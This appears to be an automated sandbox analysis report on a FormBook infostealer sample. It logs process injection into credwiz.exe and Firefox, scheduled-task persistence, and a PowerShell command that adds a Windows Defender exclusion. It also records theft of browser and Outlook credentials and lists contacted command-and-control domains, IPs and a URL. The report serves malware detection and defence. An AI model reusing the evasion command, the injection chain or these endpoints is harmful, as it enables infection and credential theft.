Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtQueryVolumeInformationFile: Direct from: 0x77D32F2C Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtProtectVirtualMemory: Direct from: 0x77D27B2E
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtAllocateVirtualMemory: Direct from: 0x77D348EC Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtQueryValueKey: Direct from: 0x77D32BEC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtDeviceIoControlFile: Direct from: 0x77D32AEC
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe NtQuerySystemInformation: Direct from: 0x77D348CC
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Section loaded: NULL target: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Section loaded: NULL target: C:\Users\user\AppData\Roaming\ygTGgAEg.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Section loaded: NULL target: C:\Windows\SysWOW64\credwiz.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: NULL target: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: NULL target: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\credwiz.exe Thread register set: target process: 4000 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\credwiz.exe Thread APC queued: target process: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ygTGgAEg.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ygTGgAEg" /XML "C:\Users\user\AppData\Local\Temp\tmp85EF.tmp" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe "C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ygTGgAEg" /XML "C:\Users\user\AppData\Local\Temp\tmp9C26.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Process created: C:\Users\user\AppData\Roaming\ygTGgAEg.exe "C:\Users\user\AppData\Roaming\ygTGgAEg.exe" Jump to behavior
Source: C:\Program Files (x86)\ZBhsenpjwMkCyTBtCAMAqdAovqfQlThgsjOJqCgBsUtzdTQVdxyZzdSZ\nYPOiVPQBw.exe Process created: C:\Windows\SysWOW64\credwiz.exe "C:\Windows\SysWOW64\credwiz.exe" Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: nYPOiVPQBw.exe, 00000017.00000002.2285137625.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, nYPOiVPQBw.exe, 00000017.00000000.1867503611.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, nYPOiVPQBw.exe, 0000001B.00000000.2019257548.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: nYPOiVPQBw.exe, 00000017.00000002.2285137625.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, nYPOiVPQBw.exe, 00000017.00000000.1867503611.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, nYPOiVPQBw.exe, 0000001B.00000000.2019257548.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: nYPOiVPQBw.exe, 00000017.00000002.2285137625.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, nYPOiVPQBw.exe, 00000017.00000000.1867503611.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, nYPOiVPQBw.exe, 0000001B.00000000.2019257548.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: nYPOiVPQBw.exe, 00000017.00000002.2285137625.0000000000D91000.00000002.00000001.00040000.00000000.sdmp, nYPOiVPQBw.exe, 00000017.00000000.1867503611.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, nYPOiVPQBw.exe, 0000001B.00000000.2019257548.0000000000EE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Queries volume information: C:\Users\user\AppData\Roaming\ygTGgAEg.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ygTGgAEg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.CrypterX-gen.112.10371.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.21.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1947512095.0000000001860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2283171505.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2284140259.00000000006B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1647613467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2284570033.0000000000750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2286306254.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1949135596.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\credwiz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\credwiz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\credwiz.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 5.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.SecuriteInfo.com.CrypterX-gen.112.10371.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1947512095.0000000001860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2283171505.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2284140259.00000000006B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1647613467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2284570033.0000000000750000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2286306254.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1949135596.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649304 Sample: SecuriteInfo.com.CrypterX-g... Startdate: 26/03/2025 Architecture: WINDOWS Score: 100 62 www.nexohealth.online 2->62 64 www.erbtechnique.dance 2->64 70 Suricata IDS alerts for network traffic 2->70 72 Sigma detected: Scheduled temp file as task from temp location 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 5 other signatures 2->76 10 ygTGgAEg.exe 5 2->10         started        13 SecuriteInfo.com.CrypterX-gen.112.10371.exe 7 2->13         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 82 Multi AV Scanner detection for dropped file 10->82 19 ygTGgAEg.exe 10->19         started        22 schtasks.exe 1 10->22         started        52 C:\Users\user\AppData\Roaming\ygTGgAEg.exe, PE32 13->52 dropped 54 C:\Users\...\ygTGgAEg.exe:Zone.Identifier, ASCII 13->54 dropped 56 C:\Users\user\AppData\Local\...\tmp85EF.tmp, XML 13->56 dropped 58 SecuriteInfo.com.C...n.112.10371.exe.log, ASCII 13->58 dropped 84 Uses schtasks.exe or at.exe to add and modify task schedules 13->84 86 Adds a directory exclusion to Windows Defender 13->86 24 powershell.exe 23 13->24         started        26 schtasks.exe 1 13->26         started        28 SecuriteInfo.com.CrypterX-gen.112.10371.exe 13->28         started        60 127.0.0.1 unknown unknown 16->60 file6 signatures7 process8 signatures9 78 Maps a DLL or memory area into another process 19->78 30 nYPOiVPQBw.exe 19->30 injected 33 conhost.exe 22->33         started        80 Loading BitLocker PowerShell Module 24->80 35 WmiPrvSE.exe 24->35         started        37 conhost.exe 24->37         started        39 conhost.exe 26->39         started        41 WerFault.exe 22 16 28->41         started        process10 signatures11 96 Maps a DLL or memory area into another process 30->96 98 Found direct / indirect Syscall (likely to bypass EDR) 30->98 43 credwiz.exe 13 30->43         started        process12 signatures13 88 Tries to steal Mail credentials (via file / registry access) 43->88 90 Tries to harvest and steal browser information (history, passwords, etc) 43->90 92 Modifies the context of a thread in another process (thread injection) 43->92 94 3 other signatures 43->94 46 nYPOiVPQBw.exe 43->46 injected 50 firefox.exe 43->50         started        process14 dnsIp15 66 www.nexohealth.online 185.104.28.238, 80 AS-ZXCSNL Netherlands 46->66 68 www.erbtechnique.dance 52.223.13.41, 49697, 80 AMAZONEXPANSIONGB United States 46->68 100 Found direct / indirect Syscall (likely to bypass EDR) 46->100 signatures16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.104.28.238
 www.nexohealth.online Netherlands
206281 AS-ZXCSNL false
52.223.13.41
 www.erbtechnique.dance United States
8987 AMAZONEXPANSIONGB false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
www.nexohealth.online 185.104.28.238 true
www.erbtechnique.dance 52.223.13.41 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.erbtechnique.dance/1c80/?fLbDV=yn28GLR&TP=jxAkT8e6KDHyZbn18Ag8BcB1queL6RnbFcOD+sI/JoqnMFd34osgQ+1OANtGW2JP7u7J4i5LjdR/bWOR5ew7EzvABsG0vrjM9Fr6mhr8DKebau2Clw== true
  • Avira URL Cloud: safe
 unknown